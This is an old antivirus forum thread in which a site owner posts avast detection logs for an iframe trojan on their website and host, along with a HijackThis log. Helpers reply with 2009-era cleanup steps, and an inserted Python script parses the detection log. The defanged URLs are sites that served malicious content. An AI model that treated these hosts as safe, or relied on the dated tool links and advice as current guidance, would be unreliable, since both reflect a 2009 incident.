5/10/2009 5:08:04 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "http://cpanel2.page14.com/" file. 
5/10/2009 5:08:58 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/10/2009 5:12:48 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/10/2009 5:16:34 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.gensap.com/" file. 
5/10/2009 5:16:39 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\EADEA65Ad01" file. 
5/10/2009 5:25:04 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/10/2009 5:25:22 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/10/2009 5:25:27 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "http://cpanel2.page14.com/" file. 
5/10/2009 5:25:51 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/10/2009 5:26:02 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/10/2009 5:27:48 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/28/2009 4:41:54 PM   SYSTEM   1604   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
5/28/2009 4:43:18 PM   SYSTEM   1604   Sign of "HTML:Framer-inf [Trj]" has been found in "hxxp://rnw.kz/index.php\{gzip}" file. 
5/28/2009 4:43:19 PM   SYSTEM   1604   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
5/28/2009 4:54:15 PM   SYSTEM   1604   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/28/2009 5:02:09 PM   SYSTEM   1604   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/28/2009 5:02:17 PM   SYSTEM   1604   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/28/2009 5:02:18 PM   SYSTEM   1604   Sign of "HTML:Framer-inf [Trj]" has been found in "hxxp://rnw.kz/index.php\{gzip}" file. 
5/28/2009 5:03:11 PM   SYSTEM   1604   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/28/2009 5:03:22 PM   SYSTEM   1604   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/28/2009 5:03:30 PM   SYSTEM   1604   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/28/2009 5:03:45 PM   SYSTEM   1604   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/28/2009 5:03:55 PM   SYSTEM   1604   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/28/2009 5:04:24 PM   SYSTEM   1604   Sign of "HTML:Framer-inf [Trj]" has been found in "hxxp://rnw.kz/index.php\{gzip}" file. 
5/28/2009 5:07:03 PM   SYSTEM   1604   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/28/2009 5:07:10 PM   SYSTEM   1604   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
6/1/2009 4:58:51 PM   SYSTEM   1652   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
6/2/2009 10:45:34 PM   SYSTEM   1400   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
6/2/2009 10:54:00 PM   SYSTEM   1400   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
6/2/2009 11:25:42 PM   Administrator   2416   Sign of "JS:Pdfka-GH [Expl]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Temporary Internet Files\Content.IE5\PL3V19GI\index[3].htm" file. 
6/2/2009 11:29:41 PM   Administrator   2416   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Temporary Internet Files\Content.IE5\PL3V19GI\valskidsline_com[1].htm" file. 
6/3/2009 11:36:28 AM   SYSTEM   1400   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
6/3/2009 11:46:42 AM   SYSTEM   1400   Sign of "JS:Redirector-H9 [Trj]" has been found in "hxxp://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/\{gzip}" file. 

So there's that. I couldn't upload an attachment, as I don't have that option, so I hope this will help.

I went on to my host's control panel, signed in and was editing the index page from there and just saving it. It was a risk just to do that much because my HOST is infected. So every time I upload, it's just going to get re-infected?

I'm switching hosts for sure, as mine clearly isn't going to fix this. If I go to another host, am I still going to have issues? I think now I have the infection in my computer, but I'm not all that smart with this..... (as you can tell)

thanks everyone!
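Reading the Web Shield log above by hand is tedious, so here is a small triage script, added here as an example and not part of the original post or of avast: it parses records in the format shown, separates hits reported against a URL (the site served flagged content) from hits in the browser cache (the local copy of that same fetched page), and counts detections per signature and origin. The sample records are constructed after the ones above.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample records in the avast 4 Web Shield log format quoted in the thread
# (the forum's defanged "hxxp://" is kept as posted); the last line is deliberately not a detection.
SAMPLE_LOG_LINES = [
    r'5/10/2009 11:55:13 AM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file. ',
    r'5/10/2009 11:57:29 AM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. ',
    r'5/10/2009 12:27:10 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Temporary Internet Files\Content.IE5\PL3V19GI\valskidsline_com[1].htm" file. ',
    r'5/10/2009 3:55:46 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. ',
    r'5/28/2009 4:43:18 PM   SYSTEM   1604   Sign of "HTML:Framer-inf [Trj]" has been found in "hxxp://rnw.kz/index.php\{gzip}" file. ',
    r'6/2/2009 11:25:42 PM   Administrator   2416   Sign of "JS:Pdfka-GH [Expl]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Temporary Internet Files\Content.IE5\PL3V19GI\index[3].htm" file. ',
    "6/2/2009 11:26:00 PM   SYSTEM   1400   Some unrelated log line that is not a detection.",
]

# One detection record: timestamp, account, pid, signature name, flagged location.
LINE_RE = re.compile(
    r'^(?P<when>\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M)\s+'
    r'(?P<user>\S+)\s+(?P<pid>\d+)\s+'
    r'Sign of "(?P<sig>[^"]+)" has been found in "(?P<where>[^"]+)" file\.\s*$'
)


def classify(where):
    """Return (kind, origin) for a flagged location.

    "web" hits carry the URL the Web Shield scanned, so origin is the host that served
    the content. "browser-cache" hits are Firefox/IE copies of pages already fetched,
    so origin is just the cache file name; they are not a separately installed file.
    """
    low = where.lower()
    if low.startswith(("http://", "hxxp://")):
        host = urlparse("http://" + where.split("://", 1)[1]).hostname
        return "web", host
    if "\\cache\\" in low or "temporary internet files" in low:
        return "browser-cache", where.rsplit("\\", 1)[-1]
    return "local-file", where


def parse_log(lines):
    """Turn raw log lines into event dicts, skipping lines that are not detections."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        kind, origin = classify(m["where"])
        events.append({**m.groupdict(), "kind": kind, "origin": origin})
    return events


def summarize(events):
    """Count detections per (signature, kind, origin) and list hosts that served flagged content."""
    by_key = Counter((e["sig"], e["kind"], e["origin"]) for e in events)
    hosts = sorted({e["origin"] for e in events if e["kind"] == "web"})
    return by_key, hosts


if __name__ == "__main__":
    counts, flagged_hosts = summarize(parse_log(SAMPLE_LOG_LINES))
    for (sig, kind, origin), n in sorted(counts.items()):
        print(f"{n:3d}  {sig:24s}  {kind:14s}  {origin}")
    print("hosts that served flagged content:", ", ".join(flagged_hosts))
```

The split between "web" and "browser-cache" is the useful part for a thread like this one: every cache hit here names a cache copy of a page that the Web Shield had also flagged at its URL, which is what you would expect if the server-side content is the source rather than the workstation.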
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: MonsterKat on June 03, 2009, 06:16:46 PM
I ran out of room on my last post.

So as you can see, there have been a lot of issues.

My host's home page is infected, my control panel through the host is infected and so is my website and potentially my computer.

I'm so lost there's no finding me lol.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: Lisandro on June 03, 2009, 07:18:22 PM
For your own computer, I suggest:

1. Clean your temporary files.
2. Schedule a boot time scanning with avast with archive scanning turned on. If avast does not detect it, you can try DrWeb CureIT! (http://www.freedrweb.com/cureit/) instead.
3. Use MBAM (http://malwarebytes.org/mbam.php) (or SUPERantispyware (http://www.superantispyware.com) or even Spyware Terminator (http://www.spywareterminator.com/)) to scan for spyware and trojans. If any infection is detected, it is better and safer to send the file to Quarantine than to simply delete it.
4. Test your machine with anti-rootkit applications (http://www.antirootkit.com/software/index.htm). I suggest avast! antirootkit (http://files.avast.com/files/beta/aswar.exe) or Trend Micro RootkitBuster (http://www.trendmicro.com/download/rbuster.asp).
5. Make a HijackThis (http://www.bleepingcomputer.com/files/hijackthis.php) log to post here or on this analysis site (http://www.hijackthis.de/#anl). Or even submit the RunScanner (http://www.runscanner.net/) log to on-line analysis.
6. Disable System Restore and then re-enable it again.
7. Immunize your system with SpywareBlaster (http://www.javacoolsoftware.com/spywareblaster.html).
8. Check if you have insecure applications with Secunia Software Inspector (http://secunia.com/software_inspector/).

For your website, I suggest cleaning the code and using strong passwords to change the code.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: avuser007 on June 03, 2009, 07:26:39 PM
My host's home page is infected

You're kidding, what's the URL? I'll remember not to use that host. :) Seriously, give us the URL so we can see if the host really is infected or if it's just something on your system.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: DavidR on June 03, 2009, 08:22:53 PM
Can you not see the first URL in the quoted text? That is his site; it is also at the start of the topic...

Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: avuser007 on June 03, 2009, 08:29:17 PM
Can you not see the first URL in the quoted text? That is his site; it is also at the start of the topic...

Can you not see I'm after the web host's infected URL, not the valskidsline site?
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: DavidR on June 03, 2009, 08:46:11 PM
The host's information is also on the topic's first page; a whois would also show the server it is hosted on.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: MonsterKat on June 04, 2009, 03:40:29 AM
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:03:44 PM, on 6/3/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16827)
Boot mode: Normal

Running processes:
C:\WINDOWS.0\System32\smss.exe
C:\WINDOWS.0\system32\winlogon.exe
C:\WINDOWS.0\system32\services.exe
C:\WINDOWS.0\system32\lsass.exe
C:\WINDOWS.0\system32\svchost.exe
C:\WINDOWS.0\System32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS.0\Explorer.EXE
C:\WINDOWS.0\system32\spoolsv.exe
C:\WINDOWS.0\system32\igfxtray.exe
C:\WINDOWS.0\system32\hkcmd.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\Program Files\Analog Devices\SoundMAX\Smtray.exe
C:\PROGRA~1\Compaq\COMPAQ~1\CHKADMIN.EXE
C:\Program Files\Lexmark 2500 Series\lxddmon.exe
C:\Program Files\Lexmark 2500 Series\lxddamon.exe
C:\Program Files\Compaq\Compaq Management Agents\cpqalert.exe
C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1\WebDmi.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
C:\Program Files\Firebird\Firebird_2_1\bin\fbguard.exe
C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
C:\WINDOWS.0\system32\ctfmon.exe
C:\Program Files\iWin Games\iWinTrusted.exe
C:\Program Files\TheWeatherNetwork\WeatherEye\WeatherEye.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\OpenOffice.org 3\program\soffice.exe
C:\Program Files\OpenOffice.org 3\program\soffice.bin
C:\WINDOWS.0\system32\lxddcoms.exe
C:\WINDOWS.0\system32\oodag.exe
C:\WINDOWS.0\system32\svchost.exe
C:\PROGRA~1\Compaq\COMPAQ~1\Dmi\Win32\bin\Win32sl.exe
C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
C:\PROGRA~1\Compaq\COMPAQ~1\cpqdmi.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\Program Files\Firebird\Firebird_2_1\bin\fbserver.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE
C:\Program Files\Mozilla Firefox\firefox.exe
C:\DOCUME~1\ADMINI~1.MOM\LOCALS~1\Temp\Temporary Directory 1 for HiJackThis.zip\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr9/*hxxp://www.yahoo.com/ext/search/search.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://us.rd.yahoo.com/customize/ie/defaults/sp/msgr9/*hxxp://www.yahoo.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://us.rd.yahoo.com/customize/ie/defaults/su/msgr9/*hxxp://www.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr9/*hxxp:
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: MonsterKat on June 04, 2009, 03:42:47 AM
//www.yahoo.com/ext/search/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://us.rd.yahoo.com/customize/ie/defaults/sp/msgr9/*hxx//www.yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yahoo.com/
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = hxxp://us.rd.yahoo.com/customize/ie/defaults/su/msgr9/*hxxp://www.yahoo.com
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = hxxp://google.ca/
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn0\yt.dll
R3 - URLSearchHook: iWin Toolbar - {ce0c2586-da36-452b-acdb-320d9bcb19bf} - C:\Program Files\iWin\tbiWi0.dll
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn0\yt.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: iWin Toolbar - {ce0c2586-da36-452b-acdb-320d9bcb19bf} - C:\Program Files\iWin\tbiWi0.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: SingleInstance Class - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn0\YTSingleInstance.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn0\yt.dll
O3 - Toolbar: iWin Toolbar - {ce0c2586-da36-452b-acdb-320d9bcb19bf} - C:\Program Files\iWin\tbiWi0.dll
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS.0\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS.0\system32\hkcmd.exe
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [Smapp] C:\Program Files\Analog Devices\SoundMAX\Smtray.exe
O4 - HKLM\..\Run: [ChkAdmin] C:\PROGRA~1\Compaq\COMPAQ~1\CHKADMIN.EXE
O4 - HKLM\..\Run: [lxddmon.exe] "C:\Program Files\Lexmark 2500 Series\lxddmon.exe"
O4 - HKLM\..\Run: [lxddamon] "C:\Program Files\Lexmark 2500 Series\lxddamon.exe"
O4 - HKLM\..\Run: [FaxCenterServer] "C:\Program Files\Lexmark Fax Solutions\fm3032.exe" /s
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Ad-Watch] C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
O4 - HKLM\..\Run: [YSearchProtection] "C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS.0\system32\ctfmon.exe
O4 - HKCU\..\Run: [WeatherEye] C:\Program Files\TheWeatherNetwork\WeatherEye\WeatherEye.exe
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [Messenger (Yahoo!)] "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
O4 - HKCU\..\Run: [Search Protection] C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
O4 - HKUS\S-1-5-21-343818398-813497703-682003330-500\..\Run: [ctfmon.exe] C:\WINDOWS.0\system32\ctfmon.exe (User '?')
O4 - HKUS\S-1-5-21-343818398-813497703-682003330-500\..\Run: [WeatherEye] C:\Program Files\TheWeatherNetwork\WeatherEye\WeatherEye.exe (User '?')
O4 - HKUS\S-1-5-21-343818398-813497703-682003330-500\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background (User '?')
O4 - HKUS\S-1-5-21-343818398-813497703-682003330-500\..\Run: [Messenger (Yahoo!)] "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet (User '?')
O4 - HKUS\S-1-5-21-343818398-813497703-682003330-500\..\Run: [Search Protection] C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe (User '?')
O4 - S-1-5-21-343818398-813497703-682003330-500 Startup: OpenOffice.org 3.0.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe (User '?')
O4 - Startup: OpenOffice.org 3.0.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS.0\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS.0\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {149E45D8-163E-4189-86FC-45022AB2B6C9} (SpinTop DRM Control) - file:///C:/Program%20Files/Bejeweled%20Twist/Images/stg_drm.ocx
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1224351659484
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - hxxp://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
O16 - DPF: {CC450D71-CC90-424C-8638-1F2DBAC87A54} (ArmHelper Control) - file:///C:/Program%20Files/Bejeweled%202/Images/armhelper.ocx
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: Compaq Local Alerter (CPQALERT) - Compaq Computer Corporation - C:\Program Files\Compaq\Compaq Management Agents\cpqalert.exe
O23 - Service: cpqdmi - Compaq Computer Corporation - C:\PROGRA~1\Compaq\COMPAQ~1\cpqdmi.exe
O23 - Service: Compaq DMI Web Agent (cpqWebDmi) - Compaq Computer Corporation - C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1\WebDmi.exe
O23 - Service: Firebird Guardian - DefaultInstance (FirebirdGuardianDefaultInstance) - FirebirdSQL Project - C:\Program Files\Firebird\Firebird_2_1\bin\fbguard.exe
O23 - Service: Firebird Server - DefaultInstance (FirebirdServerDefaultInstance) - FirebirdSQL Project - C:\Program Files\Firebird\Firebird_2_1\bin\fbserver.exe
O23 - Service: iWinTrusted - iWin Inc. - C:\Program Files\iWin Games\iWinTrusted.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: Lavasoft Ad-Aware Service - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
O23 - Service: lxddCATSCustConnectService - Lexmark International, Inc. - C:\WINDOWS.0\System32\spool\DRIVERS\W32X86\3\\lxddserv.exe
O23 - Service: lxdd_device -   - C:\WINDOWS.0\system32\lxddcoms.exe
O23 - Service: O&O Defrag - O&O Software GmbH - C:\WINDOWS.0\system32\oodag.exe
O23 - Service: Win32Sl (WIN32SL) - Intel - C:\PROGRA~1\Compaq\COMPAQ~1\Dmi\Win32\bin\Win32sl.exe
O23 - Service: Yahoo! Updater (YahooAUService) - Yahoo! Inc. - C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe

--
End of file - 10669 bytes
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: polonus on June 04, 2009, 07:55:57 PM
Hi MonsterKat,

This does not look right:
http://www.systemlookup.com/CLSID/55196-tbiWin_dll_tbiWi0_dll_tbiWi1_dll.html
Fix this:
O3 - Toolbar: iWin Toolbar - {ce0c2586-da36-452b-acdb-320d9bcb19bf} - C:\Program Files\iWin\tbiWi0.dll

polonus
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: mkis on June 04, 2009, 09:17:54 PM
Greetings DavidR (when you're back on line)

I can track down the obfuscated script on the home pages that have been sent into this thread. Thanks again for the tips last night. Trust Old Blighty to come through when they're needed.  :)

I did a bit of practice this morning (7.07AM here) and my routine for testing sites came through okay. Exactly like you said last night, these ones anyway. It's not what I'll do as a specialist, but it's always good to learn how things are done, get things down pat, so to speak, so I can do my share of following up queries about infections.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: DavidR on June 04, 2009, 10:27:24 PM
You're welcome; it doesn't take long to get wise to the tricks they use to hide from view.